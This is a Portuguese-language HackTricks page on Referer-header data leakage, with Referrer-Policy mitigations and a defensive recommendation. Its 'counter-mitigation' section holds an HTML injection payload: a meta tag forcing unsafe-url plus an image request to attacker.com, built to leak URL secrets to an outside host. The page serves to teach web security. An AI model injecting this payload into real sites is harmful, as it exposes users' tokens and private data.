Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-12-20 10:03:51 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/todo/interesting-http.md

3.6 KiB
Raw Blame History

{% hint style="success" %} Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Supporte o HackTricks
{% endhint %}

Cabeçalhos e política de Referência

Referer é o cabeçalho usado pelos navegadores para indicar qual foi a página anterior visitada.

Informações sensíveis vazadas

Se em algum momento dentro de uma página da web, qualquer informação sensível estiver localizada nos parâmetros de uma solicitação GET, se a página contiver links para fontes externas ou um atacante conseguir fazer/sugerir (engenharia social) que o usuário visite uma URL controlada pelo atacante. Isso pode permitir a exfiltração das informações sensíveis dentro da última solicitação GET.

Mitigação

Você pode fazer com que o navegador siga uma política de Referer que poderia evitar que as informações sensíveis sejam enviadas para outras aplicações web:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Contra-Mitigação

Você pode substituir esta regra usando uma tag meta HTML (o atacante precisa explorar uma injeção HTML):

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

Defesa

Nunca coloque dados sensíveis dentro de parâmetros GET ou caminhos na URL.

{% hint style="success" %} Aprenda e pratique AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}